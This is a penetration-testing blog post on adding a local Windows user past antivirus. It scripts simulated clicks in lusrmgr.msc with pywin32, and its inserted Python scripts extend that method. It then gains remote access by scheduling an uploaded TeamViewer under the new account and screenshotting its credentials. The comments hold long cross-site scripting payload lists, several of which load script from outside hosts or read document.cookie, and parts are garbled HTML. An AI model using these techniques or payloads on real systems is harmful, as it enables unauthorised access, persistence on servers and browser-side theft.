Bypass AVs to Add Users
TheKingOfDuck · Penetration Testing · 15015 views · 2019-02-16 01:45

0x01 About

Well, this is the byproduct of a failed attempt to uninstall all AVs.

The basic idea is to simulate mouse clicks and keyboard input.

The 360 uninstaller can be launched with the following command:

cd "C:/Program Files/360/360safe/" & start uninst.exe

This program's buttons have two layers of ShadowEdge protection.

Running the Python script directly to perform the click is refused.

Creating a .bat file and launching it with start bypasses that.

http://v.youku.com/v_show/id_XNDA1NzEyMzkyMA==.html?spm=a2h3j.8428770.3416059.1

As the video shows, the simulated click stops working at the final confirmation button.

Research showed that 360SPTools.exe puts up a lot of obstacles here; a full day of trying did not get past them.

On reflection, it was simpler to just add a user directly, which is how this post came about.

0x02 server

For easy tweaking, Python was used for this task. Not every target has a Python environment, so it has to be set up by hand.

Upload the embeddable version of Python directly, or use the script below to download it to the server (the script does not support HTTPS; after a long time fiddling there was no way around it, so download it from the Python website first and host it on an HTTP server; the script also unzips it):

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/download.php

The pywin32 module is needed, and the embeddable distribution ships without pip, so pip has to be installed first.

pip:

start python.exe ../get-pip.py

(Lesson learned: first edit the python37._pth file in the environment directory and uncomment the #import site line before running the command, otherwise the install fails; it also fails when not launched with start.)

pywin32:

start python.exe -m pip install pywin32

Once these have run, all required dependencies are installed; no GUI is needed for any of it.
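The setup above as one script, added here as an example; it is not the post's download.php or any code from the project. It assumes the embeddable zip is already unpacked into a directory passed on the command line, that get-pip.py sits one level above it (matching the post's `../get-pip.py`), and that python.exe is called directly. The author reports that in their shell the installs only succeeded when launched with `start`; this script does not replicate that.

```python
"""Bootstrap an embeddable Python so pip and pywin32 can be installed.

Added example, not the original post's code. Assumptions: the embeddable
zip is already unpacked in the directory given as argv[1], get-pip.py sits
one directory above it, and python.exe is invoked directly (not via start).
"""
import pathlib
import re
import subprocess
import sys


def enable_site(pth_text: str) -> str:
    """Return the ._pth content with `import site` enabled.

    The embeddable distribution ships `#import site` commented out, which
    keeps site-packages off sys.path. Handles three states: the line is
    commented, already enabled, or missing entirely (then it is appended).
    """
    out = []
    found = False
    for line in pth_text.splitlines():
        if re.fullmatch(r"\s*#\s*import\s+site\s*", line):
            out.append("import site")
            found = True
        elif line.strip() == "import site":
            out.append(line)
            found = True
        else:
            out.append(line)
    if not found:
        out.append("import site")
    return "\n".join(out) + "\n"


def find_pth(embed_dir) -> pathlib.Path:
    """Locate python3X._pth; the exact name depends on the Python version."""
    matches = sorted(pathlib.Path(embed_dir).glob("python3*._pth"))
    if not matches:
        raise FileNotFoundError(f"no ._pth file in {embed_dir}")
    return matches[0]


def bootstrap(embed_dir, get_pip="../get-pip.py") -> None:
    """Patch the ._pth file, then install pip and pywin32 with the embedded python.exe."""
    embed_dir = pathlib.Path(embed_dir)
    pth = find_pth(embed_dir)
    pth.write_text(enable_site(pth.read_text(encoding="utf-8")), encoding="utf-8")
    python_exe = embed_dir / "python.exe"
    subprocess.run([str(python_exe), str(embed_dir / get_pip)], check=True)
    subprocess.run([str(python_exe), "-m", "pip", "install", "pywin32"], check=True)


if __name__ == "__main__":
    bootstrap(sys.argv[1] if len(sys.argv) > 1 else ".")
```

The ._pth patch is the part that matters: with `import site` commented out, site-packages is never added to sys.path, so whatever get-pip.py drops there cannot be imported and the pywin32 install has nowhere to go.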

0x03 AddUsers

The first idea was to add the user through Control Panel: running control userpasswords from a script opens it, but the steps are fairly cumbersome, and since the process is explorer the window is hard to control.

It can be done through lusrmgr.msc (the Local Users and Groups management tool) instead.

Once it is open, the position of the "Users" node in the middle of the screenshot has to be computed. Testing showed that its distance from the top edge and from the left edge does not change unless someone adjusts the layout, so its coordinates can be derived from the window's top-left corner.

import win32gui

# Find the MMC main frame (the lusrmgr.msc console) by window class and read its title
MMCMainFrame = win32gui.FindWindow("MMCMainFrame", None)
# print("#######################")
titlename = win32gui.GetWindowText(MMCMainFrame)
# print(titlename)
# print("#######################")

# Collect the child window handles (the callback must append hWnd, not the parent handle)
hWndChildList = []
win32gui.EnumChildWindows(MMCMainFrame, lambda hWnd, param: param.append(hWnd), hWndChildList)
# print(hWndChildList)

# Screen coordinates of the window's top-left (a, b) and bottom-right (c, d) corners
a, b, c, d = win32gui.GetWindowRect(MMCMainFrame)

a, b are the values needed.

# Measured: the "Users" label sits 120 px below the top edge of the MMCMainFrame window; constant unless the layout is changed
# userOffsetY = 237 - 117
# print(userOffsetY)
# userOffsetY = 120
# Measured: the "Users" label sits 230 px right of the left edge of the MMCMainFrame window; constant unless the layout is changed
# userOffsetX = 1145 - 915
# print(userOffsetX)
# userOffsetX = 230

(a + 230, b + 120) is the point to click. If it differs in practice, take a screenshot with the PIL module, send it back, and recompute.

The rest is ordinary simulated clicking and typing; see the full code at:

https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/adduser.py
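The coordinate derivation and the click/type steps described above, as an added example; this is not the post's adduser.py. It assumes the author's measured offsets (230 px right and 120 px down from the window's top-left corner, which only hold for that layout and 100% DPI scaling) and the MMCMainFrame window class. pywin32 is imported inside the functions that need it, so the geometry helper also runs where pywin32 is not installed; the launcher name `mmc.exe lusrmgr.msc`, the polling timeout and the per-key delay are assumptions.

```python
"""Find the lusrmgr.msc console, derive the "Users" click point from the
window rect, and drive mouse/keyboard input through pywin32.

Added example, not the post's adduser.py. Assumed offsets and window
class come from the post; launcher, timeout and key delay are guesses.
"""
import subprocess
import time

# Offsets measured by the post's author: (1145 - 915, 237 - 117).
# Assumption: default console layout at 100% DPI scaling.
USERS_DX, USERS_DY = 230, 120


def target_point(rect, dx=USERS_DX, dy=USERS_DY):
    """Absolute screen point of the "Users" node for a (left, top, right, bottom) rect.

    Raises ValueError when the offset lands outside the window, e.g. when the
    console opened smaller than expected; a click there would hit whatever
    is underneath instead of the tree node.
    """
    left, top, right, bottom = rect
    x, y = left + dx, top + dy
    if not (left <= x < right and top <= y < bottom):
        raise ValueError(f"({x},{y}) lies outside window rect {rect}")
    return x, y


def wait_for_window(cls_name, timeout=15.0, poll=0.5):
    """Poll FindWindow until a top-level window of class cls_name exists."""
    import win32gui  # pywin32, Windows-only
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        hwnd = win32gui.FindWindow(cls_name, None)
        if hwnd:
            return hwnd
        time.sleep(poll)
    raise TimeoutError(f"no window of class {cls_name} within {timeout}s")


def click(x, y):
    """Move the cursor and send a left button down/up at absolute coordinates."""
    import win32api, win32con
    win32api.SetCursorPos((x, y))
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)


def type_text(text, delay=0.02):
    """Type ASCII text into the focused control, holding Shift where VkKeyScan requires it."""
    import win32api, win32con
    for ch in text:
        scan = win32api.VkKeyScan(ch)   # low byte: virtual key, bit 8: shift needed
        shift = (scan >> 8) & 1
        vk = scan & 0xFF
        if shift:
            win32api.keybd_event(win32con.VK_SHIFT, 0, 0, 0)
        win32api.keybd_event(vk, 0, 0, 0)
        win32api.keybd_event(vk, 0, win32con.KEYEVENTF_KEYUP, 0)
        if shift:
            win32api.keybd_event(win32con.VK_SHIFT, 0, win32con.KEYEVENTF_KEYUP, 0)
        time.sleep(delay)


def open_users_node():
    """Launch lusrmgr.msc, bring it to the front and click the "Users" node."""
    import win32gui
    subprocess.Popen(["mmc.exe", "lusrmgr.msc"])
    hwnd = wait_for_window("MMCMainFrame")
    win32gui.SetForegroundWindow(hwnd)  # synthetic clicks go to the foreground window
    time.sleep(1.0)                      # let the console finish painting
    x, y = target_point(win32gui.GetWindowRect(hwnd))
    click(x, y)
    return hwnd


if __name__ == "__main__":
    open_users_node()
```

The out-of-rect check is the one addition worth keeping even if you drop the rest: the offsets are relative to the window, so a console that opens at a different size silently turns the "Users" click into a click on whatever is behind it.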

0x04 Test

360 full suite, SafeDog (安全狗), D-Shield (D盾):

The original video is in the attached archive:

http://v.youku.com/v_show/id_XNDA1NzEyNTc1Ng==.html?spm=a2h3j.8428770.3416059.1

(YunSuo (云锁) requires installation on a server, so it has not been tested yet.)

0x05 Summary

After the user has been added, if the server does not have 3389 open, upload a single-file build of TeamViewer
and run it with the following command:

schtasks /create /sc minute /mo 1 /tn "cat" /tr <path to TeamViewer> /ru <created username> /rp <created password>

Use PIL to take a screenshot and read off the connection ID and password:

from PIL import ImageGrab
im = ImageGrab.grab()        # capture the whole screen
im.save('screenshot.png')    # retrieve this file to read the TeamViewer ID/password

This way, remote desktop access is obtained without any 0-day, using only legitimate files throughout.

7 comments
TheKingOfDuck
2019-03-09 11:19 0 Reply

<svg><style>{font-family:'<iframe/onload=confirm(1)>'</style></svg>


<input/onmouseover="javaSCRIPT:confirm(1)"


<svg><scRipt %00>alert(1) {Opera}</svg>

<img/src=%00 onerror=this.onerror=confirm


<form><isindex formaction="javascript:confirm(1)"

<img src=%00
onerror=alert(1)


<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>


<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?


iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="


<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='\u0061lert(1)'>%00


<iframe/src="data:text/html,<svg onload=alert(1)>"


<meta content="
1
; JAVASCRIPT: alert(1)" http-equiv="refresh">


<svg><script xlink:href=data:,window.open('https://www.blog.zsec.uk/')></script</svg>


<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</svg>


<meta content="0;url=javascript:confirm(1)" http-equiv="refresh">


<iframe src=javascript:alert(document.location)>


X

</script><img/%00/src="worksinchrome:prompt(1)"/%00/onerror='eval(src)'>

<img/
src=~ onerror=prompt(1)>


<iframe
src="javascript:alert(1)"
;>

<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[�]"� onmouseover=prompt(1)//">XYZ</a

<img/src=@
onerror = prompt('1')


<style/onload=prompt('XSS'&#41


<script ^__^>alert(String.fromCharCode(49))</script

</style ><script :-(>//alert(document.location)//</script :-(

�</form><input type="date" onfocus="alert(1)">


<textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>


<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //


<iframe srcdoc="&lt;body onload=prompt(1)&gt;"><br>
&lt;a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;&gt;X&lt;/a&gt;</p>
<p>&lt;script <del>~&gt;alert(0%0)&lt;/script ~</del>&gt;</p>
<p>&lt;style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;&gt;<br>
&lt;///style///&gt;&lt;span %2F onmousemove='alert&lpar;1&rpar;'&gt;SPAN<br>
&lt;img/src='<a href="http://i.imgur.com/P8mL8.jpg">http://i.imgur.com/P8mL8.jpg</a>' onmouseover=&Tab;prompt(1)<br>
&#34;&#62;<svg><style>{-o-link-source&colon;'&lt;body/onload=confirm(1)&gt;'<br>
&#13;&lt;blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}</p>
<p><marquee onstart='javascript:alert&#x28;1&#x29;'>^__^</p>
<p><a href="div/style="width:expression(confirm(1))"">div/style="width:expression(confirm(1))"</a>X&lt;/div&gt; {IE7}</p>
<p>&lt;iframe/%00/ src=javaSCRIPT&colon;alert(1)<br>
//&lt;form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;&gt;&lt;input/type='submit'&gt;//<br>
/<em>iframe/src</em>/<a href="mailto:iframe/src="&lt;iframe/src=@"/onload=prompt/*iframe/src*/">iframe/src="&lt;iframe/src=@"/onload=prompt/*iframe/src*/</a><br>
//|\ &lt;script //|\ src='<a href="https://dl.dropbox.com/u/13018058/js.js'&gt;">https://dl.dropbox.com/u/13018058/js.js'&gt;</a> //|\ &lt;/script //|\<br>
&lt;/font&gt;/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg>&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert&#x28;1&#x29; {Opera}<br>
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button></p>
<p><div onmouseover='alert&lpar;1&rpar;'>DIV</div></p>
<p><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><br>
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a></p>
<p><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"></p>
<p><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><br>
<var onmouseover="prompt(1)">On Mouse Over</var><br>
&lt;a href=javascript&colon;alert&lpar;document&period;cookie&rpar;&gt;Click Here&lt;/a&gt;<br>
&lt;img src="/" =_=" title="onerror='prompt(1)'"&gt;<br>
&lt;%<!--'%><script>alert(1);</script --></p>
<p><script src="data:text/javascript,alert(1)"></script></p>
<p>&lt;iframe/src \/\/onload = prompt(1)</p>
<p>&lt;iframe/onreadystatechange=alert(1)</p>
<p>&lt;svg/onload=alert(1)</p>
<p>&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)</p>
<p>&lt;input type="text" value=`` &lt;div/onmouseover='alert(1)'&gt;X&lt;/div&gt;<br>
<a href="http://www">http://www</a>.<script>alert(1)&lt;/script .com</p>
<p>&lt;iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29&gt;&lt;/iframe&gt;</p>
<p><svg>&lt;script ?&gt;alert(1)</p>
<p>&lt;iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29&gt;&lt;/iframe&gt;<br>
&lt;img src=<code>xx:xx</code>onerror=alert(1)&gt;</p>
<p><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object></p>
<p><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/></p>
<p><math>&lt;a xlink:href="//jsfiddle.net/t846h/"&gt;click</p>
<p>&lt;embed code="<a href="http://businessinfo.co.uk/labs/xss/xss.swf">http://businessinfo.co.uk/labs/xss/xss.swf</a>" allowscriptaccess=always&gt;</p>
<p>&lt;svg contentScriptType=text/vbs&gt;<script>MsgBox<br>
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X&lt;/a</p>
<p>&lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE&gt;</p>
<p><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')&lt;/script U</p>
<p>&lt;script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"&gt;&lt;/script a=\u0061 &amp; /=%2F</p>
<p>&lt;script/src=data&colon;text/j\u0061v\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script</p>
<p>&lt;object data=javascript&colon;\u0061&#x6C;&amp;#101%72t(1)&gt;</p>
<p><script>++1-+?(1)</script></p>
<p>&lt;body/onload=&lt;!--&gt;&amp;#10alert(1)&gt;</p>
<p><script itworksinallbrowsers>/<em>&lt;script</em> */alert(1)&lt;/script<br>
&lt;img src ?itworksonchrome?\/onerror = alert(1)</p>
<p><svg><script>//&NewLine;confirm(1);</script </svg></p>
<p><svg>&lt;script onlypossibleinopera:-)&gt; alert(1)<br>
&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&#x3A;&amp;#97lert(1)&gt;ClickMe</p>
<p><script x> alert&lt;/script 1=2</p>
<p>&lt;div/onmouseover='alert(1)'&gt; style="x:"&gt;<br>
&lt;--<code>&lt;img/src=</code> onerror=alert(1)&gt; --!&gt;</p>
<p><a href="script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)">script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)</a>&lt;/script&gt;</p>
<p><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x&lt;/button&gt;<br>
"&gt;&lt;img src=x onerror=window.open('<a href="https://www.zsec.uk');&gt;">https://www.zsec.uk');&gt;</a></p>
<p><form>&lt;button formaction=javascript&colon;alert(1)&gt;CLICKME</p>
<p><math>&lt;a xlink:href="//blog.zsec.uk"&gt;click</p>
<p>&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik&gt;&lt;/object&gt;</p>
<p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

1Click Me

'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E

<scr\0ipt/src=http://xss.com/xss.js</script

%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E

' onmouseover=alert(/Black.Spook/)

">iframe%20src="http://blog.zsec.uk"%%203E
'<script
window.onload=function(){document.forms[0].message.value='1';}</script>

x”</title><img src%3dx onerror%3dalert(1)>


</form>
TheKingOfDuck
2019-03-09 11:18 0 Reply


<SCRIPT/XSS SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>

<<script>alert("XSS");//<</script>


<SCRIPT SRC=http://blog.zsec.uk/xss.js?


<SCRIPT SRC=//blog.zsec.uk/.j>


<IMG SRC="javascript:alert('XSS')"


<iframe src=http://blog.zsec.uk/scriptlet.html <


<script>a=/XSS/
alert(a.source)</script>

";alert('XSS');//

</TITLE><script>alert("XSS");</script>


<input src="javascript:alert('XSS');" type="IMAGE">



<BODY ONLOAD=alert('XSS')>




<bgsound src="javascript:alert('XSS');"></bgsound>




<layer src="http://blog.zsec.uk/
scriptlet.html"></layer>


<link href="javascript:alert('XSS');" rel="stylesheet">


<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>


<meta content="&lt;http://blog.zsec.uk/xss.css&gt;; REL=stylesheet" http-equiv="Link">


<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>


<xss style="behavior: url(xss.htc);"></xss>


<style>li {list-style-image: url("javascript:alert('XSS')");}</style>

  • XSS





    <meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">


    <meta content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" http-equiv="refresh">


    <meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">


    <iframe src="javascript:alert('XSS');"></iframe>










    <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>



    <xss style="xss:expression(alert('XSS'))">

    exp/<A STYLE='no\xss:noxss("**");

    xss:ex/
    XSS*//**pression(alert("XSS"))'></xss>


    <style type="text/javascript">alert('XSS');</style>


    <style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>


    <style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>

    <!--[if gte IE 4]>


    <script>alert('XSS');</script>

    <![endif]-->


    <base href="javascript:alert('XSS');//">


    <object data="http://blog.zsec.uk/scriptlet.html" type="text/x-scriptlet"></object>


    <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>


    <embed allowscriptaccess="always" src="http://blog.zsec.uk/xss.swf">


    <HTML xmlns:xss>

    <?import namespace="xss" implementation="http://blog.zsec.uk/xss.htc">


    xss:xssXSS/xss:xss

    </HTML>


    <XML ID=I><x><c>]]>
    </c></x></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


    <xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml>



    <XML SRC="xsstest.xml" ID=I></XML>


    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>




    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">


    <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>


    <script src="http://blog.zsec.uk/xss.jpg"></script>


    <meta content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;" http-equiv="Set-Cookie">


    <meta content="text/html; charset=UTF-7" http-equiv="CONTENT-TYPE"> <script>alert('XSS');</script>


    <script a="&gt;" src="http://blog.zsec.uk/xss.js"></script>


    <SCRIPT =">" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT a=">" '' SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT "a='>'" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <SCRIPT a=> SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    <script a="&gt;'&gt;" src="http://blog.zsec.uk/xss.js"></script>


    <script>document.write("<SCRI");</script>PT SRC="http://blog.zsec.uk/xss.js"></SCRIPT>


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    XSS


    <iframe %00 src=" javascript:prompt(1) "%00>


TheKingOfDuck
2019-03-09 11:17 0 Reply



'"></title><script>alert(1111)</script>

</textarea>'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X nS nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>


<input src="javascript:alert('XSS');" type="IMAGE">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>


<noalert><noscript>(123)</noscript><script>(123)</script></noalert>


<IMG SRC=JaVaScRiPt:alert('XSS')>


<IMG SRC=javascript:alert('XSS')>



<IMG SRC=javascript:alert("RSnake says, 'XSS'")>






<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>


SCRIPT/SRC="http://blog.zsec.uk/xss.js"</SCRIPT>

<<script>alert("XSS");//<</script>


<SCRIPT SRC=//blog.zsec.uk/.j>


<IMG SRC="javascript:alert('XSS')"


<iframe src=http://blog.zsec.uk/scriptlet.html <

";alert('XSS');//

</TITLE><script>alert("XSS");</script>


<input src="javascript:alert('XSS');" type="IMAGE">





<style>li {list-style-image: url("javascript:alert('XSS')");}</style>

  • XSS</br>




    <BODY ONLOAD=alert('XSS')>


    <bgsound src="javascript:alert('XSS');"></bgsound>




    <link href="javascript:alert('XSS');" rel="stylesheet">


    <link href="http://blog.zsec.uk/xss.css" rel="stylesheet">

    <STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>


    <meta content="&lt;http://blog.zsec.uk/xss.css&gt;; REL=stylesheet" http-equiv="Link">


    <style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>

    <STYLE>@import'javascript:alert("XSS")';</STYLE>



    <style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>


    <style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>


    <xss style="xss:expression(alert('XSS'))"></xss>


    <xss style="behavior: url(xss.htc);">

    <a href="javascript:alert(-1)">hello</a>

    <a href="javascript:alert(-1)"

    Hello

    <a <!-- href="javascript:alert(31337);">Hello</a>

    <map name="planetmap"><area a-="&gt;" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>


    <IMG SRC=javascript:alert('XSS')>


    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

    " onhover="javascript:alert(-1)"

    "><script>alert('test')</script>

    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><script>alert(String.fromCharCode(88,83,83))</script>


    <SCRIPT SRC=http://blog.zsec.uk/xss.js></SCRIPT>



    <IMG SRC=JaVaScRiPt:alert('XSS')>


    <IMG SRC=javascript:alert("XSS")>


    <IMG SRC=javascript:alert("RSnake says, 'XSS'")>


    <IMG """><script>alert("XSS")</script>">


    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


    <IMG SRC=javascript:alert('XSS')>


    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>


    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>






    <IMG


    SRC


    "

    j

    a

    v

    a

    s

    c

    r

    i

    p

    t

    :

    a

    l

    e

    r

    t

    (

    '

    X

    S

    S

    '

    )

    "

    >


TheKingOfDuck
2019-03-09 11:16 0 Reply

No dos expression vector <i style=x:expression(alert(URL=1))>


<svg><style>*{font-family:'<svg onload="alert(1)">';}</svg></style></svg>

JSLR( @garethheyes ) challenge result:

@irsdl challenge result:


Vbscript XHR by @masa141421356

XML Entity XSS by @garethheyes

Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa

<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes

IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke


<xmp><img alt="</xmp><img src=xx:x onerror=alert(1)//"> Classic vector by slacker :D

name Classic html entity inject vector

A nice opera xss: Put 65535 Bytes before and Unicode Sign by @insertScript


<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F

JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke


<meta content="0;url=http://good/[&gt;&gt;&gt;inj];url=http://evil/[&lt;&lt;&lt;inj]" http-equiv="refresh"> IE6-7 Inject vector by @kinugawamasato

IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes


<svg><script>a='<svg onload="alert(1)"></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa</script></svg>

Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F</svg>


<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes

FF CLICK by @0x6D6172696F


<noscript> by @jackmasa H5SC:
click non-IE
click Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute!
<embed allowscriptaccess="always" code="http://businessinfo.co.uk/labs/xss/xss.swf">

